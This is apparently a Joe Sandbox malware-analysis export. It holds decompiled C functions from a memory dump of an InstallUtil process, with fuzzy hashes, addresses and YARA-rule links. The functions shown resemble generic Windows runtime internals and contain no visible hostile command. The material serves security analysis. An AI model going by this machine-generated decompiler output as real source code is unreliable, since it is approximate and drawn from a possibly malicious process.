Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 677017ab87cd44250d058bd201156834107a47260bdf255699756533fd183f0e
Instruction ID: 4166f75dfd9796f9ade1cffc29c4e7a10fd6787615c8410428b81488cc17811f
Opcode Fuzzy Hash: 677017ab87cd44250d058bd201156834107a47260bdf255699756533fd183f0e
Instruction Fuzzy Hash: 6731C371A1022AABCF15AF68CD81A7FB7B9EF54B00F41446DFA05E7240E7749911CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01308EC7 Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E01308EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x13bd360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E012F4E70(0x13b86e4, 0x1309490, 0, 0);
					if( *0x13b53e8 > 5 && E01308F33(0x13b53e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x13b53e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x13b53e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x12abc46;
						_t48 = E01347B9C(0x13b53e8, 0x12abc46, _t67, 0x13b53e8, _t70,  &_v140);
					}
				}
				return E0130B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}

0x01308ec7
0x01308ed9
0x01308edc
0x01308ee6
0x01308ee9
0x01308eee
0x01308efc
0x01308f08
0x01341349
0x01341353
0x0134135d
0x01341366
0x0134136f
0x01341375
0x0134137c
0x01341385
0x01341390
0x01341391
0x0134139c
0x0134139d
0x013413a6
0x013413ac
0x013413b2
0x013413b5
0x013413bc
0x013413bf
0x013413c2
0x013413c5
0x013413c8
0x013413cb
0x013413ce
0x013413d1
0x013413d4
0x013413d7
0x013413da
0x013413dd
0x013413e0
0x013413e3
0x013413e6
0x013413e9
0x013413f6
0x01341400
0x01341400
0x01308f08
0x01308f32

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f27171ece84c6c5b55c8ced11205acc5d5df8c59f21f0c023c7cb846ab47b01a
Instruction ID: 98fa7d8c9ae257a18150fd165ed6ef5971da706ad023bcc7f33c673f92897da0
Opcode Fuzzy Hash: f27171ece84c6c5b55c8ced11205acc5d5df8c59f21f0c023c7cb846ab47b01a
Instruction Fuzzy Hash: CA4181B1D0121C9FDB20CFAAD981AADFBF8FB48714F5041AEE609A7640E7705A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 012FE730 Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E012FE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E01309670() < 0) {
					E0131DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x13b7b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L012E4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M012FE810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

0x012fe730
0x012fe736
0x012fe738
0x012fe73d
0x012fe73e
0x012fe740
0x012fe749
0x012fe765
0x012fe76a
0x012fe76b
0x012fe76c
0x012fe76d
0x012fe76e
0x012fe76f
0x012fe775
0x012fe777
0x012fe77e
0x0133b675
0x012fe784
0x012fe784
0x012fe789
0x012fe7a8
0x012fe7ac
0x012fe807
0x012fe7ae
0x012fe7ae
0x012fe7b1
0x012fe7b4
0x012fe7b9
0x012fe7c0
0x012fe7c4
0x012fe7ca
0x012fe7cc
0x00000000
0x012fe7d3
0x012fe7d6
0x00000000
0x00000000
0x012fe7ff
0x012fe802
0x00000000
0x00000000
0x012fe7f9
0x012fe7fc
0x00000000
0x00000000
0x012fe7f3
0x012fe7f6
0x00000000
0x00000000
0x012fe7ed
0x012fe7f0
0x00000000
0x00000000
0x012fe7e7
0x012fe7ea
0x00000000
0x00000000
0x0133b685
0x0133b688
0x00000000
0x00000000
0x0133b682
0x00000000
0x00000000
0x012fe7cc
0x012fe7d9
0x012fe7dc
0x012fe7de
0x012fe7de
0x012fe7ac
0x012fe7e4
0x012fe74b
0x012fe751
0x012fe759
0x012fe761
0x012fe761

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b74871e28662b0c2b7149a27c3c0478510aa12c1334b1f29200e7ab6c12240d7
Instruction ID: eee69e128774ba7bb3889808cbb6a29cce35f48e4b01ed6d4995f05054218a4a
Opcode Fuzzy Hash: b74871e28662b0c2b7149a27c3c0478510aa12c1334b1f29200e7ab6c12240d7
Instruction Fuzzy Hash: 23318F75A24249EFD705DF58D841B9AFBE4FB09314F15826AFA08CB391D671ED80CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 012FBC2C Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E012FBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x13b6100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E012E2280(0xd, 0x628f1a0);
				_t41 =  *0x13b60f8; // 0x0
				if(_t41 != 0) {
					 *0x13b60f8 =  *_t41;
					 *0x13b60fc =  *0x13b60fc + 0xffff;
				}
				E012DFFB0(_t41, 0x800, 0x628f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x13b60f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L012E4620(0x13b6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x13b6100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}

0x012fbc36
0x012fbc42
0x012fbc45
0x012fbc4a
0x012fbd35
0x00000000
0x00000000
0x00000000
0x00000000
0x012fbc50
0x012fbc50
0x012fbc58
0x012fbc5a
0x012fbc60
0x00000000
0x00000000
0x0133a4f2
0x0133a4f6
0x00000000
0x00000000
0x00000000
0x0133a4fc
0x012fbc79
0x012fbc7e
0x012fbc86
0x012fbd16
0x012fbd20
0x012fbd20
0x012fbc8d
0x012fbc94
0x012fbcbd
0x012fbcca
0x012fbccb
0x012fbccc
0x012fbccd
0x012fbcce
0x012fbcd4
0x012fbcea
0x012fbcee
0x012fbcf2
0x012fbd00
0x012fbd04
0x00000000
0x012fbc96
0x012fbcab
0x012fbcaf
0x012fbd2c
0x012fbd2c
0x012fbd09
0x00000000
0x012fbd09
0x012fbcb1
0x012fbcb5
0x012fbcbb
0x00000000
0x00000000
0x00000000
0x012fbcbb

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e70b98d4840487c8aac01063d806914d26e9d33cc603278f19ba30146180a0bc
Instruction ID: 375bee2bb7d15fd7ed9909a365e707d01164089df1028dd81375cd5bf3103806
Opcode Fuzzy Hash: e70b98d4840487c8aac01063d806914d26e9d33cc603278f19ba30146180a0bc
Instruction Fuzzy Hash: ED3120B6A206069FCB21DF58C4C27A6B3B8FF18310F040078EF49DB246EB74D9058B81

Uniqueness

Uniqueness Score: -1.00%

Function 012C9100 Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E012C9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x139f6e8);
				E0131D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E013988F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0131D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x13b86c0; // 0xe607b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x13b86b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E012E2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E013988F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E0130AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x13bb1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x13b84c0;
										if(_t69 >=  *0x13b84c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E01399063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E012C922A(_t82);
							_t53 = E012E7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E01398B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x13b86c0; // 0xe607b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x13b86b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x13b86bc;
										_t72 = 0x13b86b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E012C9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x13b86c4;
									_t72 = 0x13b86c0;
									L18:
									E012F9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}

0x012c9100
0x012c9100
0x012c9100
0x012c9100
0x012c9102
0x012c9107
0x012c910c
0x012c9110
0x012c9115
0x012c9136
0x012c9143
0x013237e4
0x013237e4
0x012c9149
0x012c914e
0x012c914e
0x012c9117
0x012c911d
0x00000000
0x00000000
0x012c911f
0x012c9125
0x00000000
0x012c9151
0x012c9158
0x012c915d
0x012c9161
0x012c9168
0x01323715
0x00000000
0x012c916e
0x012c916e
0x012c9175
0x012c9177
0x012c917e
0x012c917f
0x012c9182
0x012c9182
0x012c9187
0x012c9187
0x012c918a
0x012c918d
0x012c918f
0x012c9192
0x012c9195
0x012c9198
0x012c9198
0x012c9198
0x012c919a
0x00000000
0x00000000
0x0132371f
0x01323721
0x01323727
0x0132372f
0x01323733
0x01323735
0x01323738
0x0132373b
0x0132373d
0x01323740
0x00000000
0x00000000
0x01323746
0x01323749
0x00000000
0x00000000
0x0132374f
0x01323751
0x00000000
0x00000000
0x01323757
0x01323759
0x0132375c
0x0132375c
0x0132375e
0x0132375e
0x01323761
0x01323764
0x00000000
0x00000000
0x01323766
0x01323768
0x013237a3
0x013237a3
0x013237a5
0x013237a7
0x013237ad
0x013237b0
0x013237b2
0x013237bc
0x013237c2
0x013237c2
0x013237b2
0x012c9187
0x012c9187
0x012c918a
0x012c918d
0x012c918f
0x012c9192
0x012c9195
0x00000000
0x012c9195
0x00000000
0x012c9187
0x0132376a
0x0132376a
0x0132376c
0x0132376c
0x0132376f
0x01323775
0x00000000
0x00000000
0x01323777
0x01323779
0x00000000
0x00000000
0x01323782
0x01323787
0x01323789
0x01323790
0x01323790
0x0132378b
0x0132378b
0x0132378b
0x01323792
0x01323795
0x01323795
0x01323798
0x01323798
0x0132379b
0x0132379b
0x012c91a3
0x012c91a9
0x012c91b0
0x012c91b4
0x012c91b4
0x012c91bb
0x012c91c0
0x012c91c5
0x012c91c7
0x013237da
0x012c91cd
0x012c91cd
0x012c91cd
0x012c91d2
0x012c91d5
0x012c9239
0x012c9239
0x012c91d7
0x012c91db
0x012c91e1
0x012c91e7
0x012c91fd
0x012c9203
0x012c921e
0x012c9223
0x00000000
0x012c9223
0x012c9205
0x012c9208
0x012c920c
0x012c9214
0x012c9214
0x012c91e9
0x012c91e9
0x012c91ee
0x012c91f3
0x012c91f3
0x012c91f3
0x012c91e7
0x00000000
0x012c91db
0x012c9187
0x012c9168

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a7497a574c1208a83ed067a28f48ccf09231eacdae597969d0cdc57f5972b3e
Instruction ID: c48afdf6269f2f29b00e5c443ecf4699ddbb3e6cde39db8ed510ea8b2e512ba1
Opcode Fuzzy Hash: 2a7497a574c1208a83ed067a28f48ccf09231eacdae597969d0cdc57f5972b3e
Instruction Fuzzy Hash: 3A31E575A21246DFDF26DB6CC0897ACBBB5BB89B2CF14829DC70467241D3B4A9C0CB51

Uniqueness

Uniqueness Score: -1.00%

Function 012F1DB5 Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E012F1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E012EF460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L012E4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E012EF460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}

0x012f1dc2
0x012f1dc5
0x012f1dc7
0x012f1dcc
0x012f1dce
0x012f1dd6
0x012f1ddf
0x012f1de0
0x012f1de1
0x012f1de5
0x012f1de8
0x012f1def
0x012f1df0
0x012f1df6
0x012f1df7
0x012f1dfe
0x012f1e1a
0x00000000
0x00000000
0x012f1e0b
0x012f1e12
0x012f1e12
0x012f1e00
0x012f1e00
0x012f1e05
0x012f1e1e
0x012f1e23
0x0133570f
0x01335713
0x00000000
0x00000000
0x01335719
0x01335719
0x012f1e2c
0x012f1e2d
0x012f1e2e
0x012f1e2f
0x012f1e31
0x012f1e32
0x012f1e35
0x012f1e3d
0x01335723
0x0133573d
0x0133573d
0x00000000
0x01335723
0x012f1e49
0x012f1e4e
0x012f1e4e
0x012f1e09
0x00000000

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction ID: 02a0a191082a85e2611c9f25c90c10611aecb395f95af2ecd56a5388a8e8c52d
Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction Fuzzy Hash: 3B21A132620119EFD725CF59CC84EABFBBDEF85A40F514069EB0597210D630AE11CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01346C0A Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E01346C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E012E7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x13b7b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L012E4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E0130F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E012E7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E01309AE0();
						_t23 = L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}

0x01346c0a
0x01346c0f
0x01346c10
0x01346c13
0x01346c15
0x01346c19
0x01346c1c
0x01346c21
0x01346c28
0x01346c3a
0x01346c2a
0x01346c33
0x01346c33
0x01346c3f
0x01346c48
0x01346c4d
0x01346c60
0x01346c65
0x01346c69
0x01346c73
0x01346c79
0x01346c7f
0x01346c86
0x01346c90
0x01346c94
0x01346ca6
0x01346cb2
0x01346cbd
0x01346cbd
0x01346cc3
0x01346cc7
0x01346ccb
0x01346cd0
0x01346cd1
0x01346ce2
0x01346ce2
0x01346c69
0x01346ced

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4bc93f0b74522fb0104a926051273bc39641eb522bedd49b4150d02e8f96c36
Instruction ID: bdabead817be7ef3562bed4e58f199183c3c15a122ad8079975031d3d312494f
Opcode Fuzzy Hash: f4bc93f0b74522fb0104a926051273bc39641eb522bedd49b4150d02e8f96c36
Instruction Fuzzy Hash: D2219AB1A00645AFDB15DF68D884F2AB7E8FF48704F040069F908C7791D635ED50CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 013090AF Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E013090AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E0131D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E012FE5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L012E4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
